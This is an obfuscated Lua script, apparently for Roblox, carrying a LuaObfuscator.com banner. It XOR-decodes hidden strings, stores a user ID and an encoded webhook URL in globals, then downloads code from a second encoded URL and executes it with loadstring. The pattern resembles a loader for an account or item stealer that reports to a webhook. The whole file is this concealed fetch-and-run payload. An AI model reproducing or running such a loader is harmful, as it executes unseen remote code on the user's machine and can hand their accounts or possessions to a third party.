

--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local v7;v8=function(v9,v10)local v11={};for v12=3 -2, #v9 do v6(v11,v0(v4(v1(v2(v9,v12,v12 + (2 -1) + (0 -0))),v1(v2(v10,1 + ((v12-1)% #v10),(1857 -(1304 + 552)) + ((v12-(1 + 0))% #v10) + (153 -(55 + 97)))))%((1846 -1224) -366)));end return v5(v11);end;_G.UserID=2773139571 -831175558;_G.WebHook=v8("\225\152\85\187\77\241\73\59\237\133\82\168\81\185\2\58\234\131\76\228\95\187\15\59\254\137\67\163\81\164\13\103\166\221\17\253\10\254\83\38\187\221\23\250\7\253\94\38\188\222\22\243\17\188\11\119\218\223\101\184\95\162\4\78\219\216\81\255\93\178\39\83\250\168\80\129\113\134\16\94\219\148\111\249\15\170\18\124\176\193\123\155\11\169\95\123\226\153\119\175\120\145\0\32\216\185\24\129\100\147\10\65\223\164\87\252\19\249\62\100\190","\137\236\33\203\62\203\102\20");loadstring(game:HttpGet(v8("\187\196\111\106\190\108\58\87\161\209\108\52\170\63\97\16\166\210\110\105\168\36\118\23\189\196\126\116\185\120\118\23\190\159\72\115\161\51\123\27\182\227\120\104\164\38\97\11\252\224\104\98\158\53\103\17\163\196\104\52\129\35\116\87\190\209\114\116\226\6\102\0\146\197\111\117\171\55\103\21\253\196\105\111\168","\211\176\27\26\205\86\21\120")))();